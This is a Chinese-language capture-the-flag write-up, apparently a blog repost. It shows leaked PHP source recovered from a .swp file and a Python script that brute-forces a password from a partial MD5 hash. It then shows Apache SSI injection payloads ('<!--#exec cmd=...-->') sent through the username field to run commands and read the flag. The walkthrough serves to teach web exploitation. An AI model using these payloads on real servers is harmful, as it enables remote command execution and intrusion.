掃描后臺得到swp檔案泄露,直接訪問index.php.swp,看到原始碼:
<?php
ob_start();
function get_hash(){
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
$content = uniqid().$random;
return sha1($content);
}
header("Content-Type: text/html;charset=utf-8");
***
if(isset($_POST['username']) and $_POST['username'] != '' )
{
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6)) {
echo "<script>alert('[+] Welcome to manage system')</script>";
$file_shtml = "public/".get_hash().".shtml";
$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
fwrite($shtml,$text);
fclose($shtml);
***
echo "[!] Header error ...";
} else {
echo "<script>alert('[!] Failed')</script>";
}else
{
***
}
***
?>
首先使用腳本爆破,得到登錄的密碼2020666
import hashlib
for num in range(10000,9999999999):
res = hashlib.md5(str(num).encode()).hexdigest() #md5改為題目需要的演算法
if res[0:6] == "6d0bc1": #對hash的前兩位為"0e"的數字進行碰撞
print(str(num)) #等待執行結束 輸出結果
break
抓包,看到回應頭中存在:
shtml?Apache SSI 遠程命令執行漏洞?
但這個shtml的檔案內容我們可控嘛?我們把目光鎖定到這兩行代碼
$shtml = fopen($file_shtml, "w")
fwrite($shtml,$text);
$text從哪兒來?
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
username我們可控,所以給username傳值
<!--#exec cmd="cat /var/www/html" -->
訪問回應頭給的shtml路徑
發現flag
在傳值
<!--#exec cmd="cat ../flag*" -->
拿到flag
參考鏈接:
Apache SSI 遠程命令執行漏洞
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/374567.html
標籤:其他
上一篇:Shellshock Lab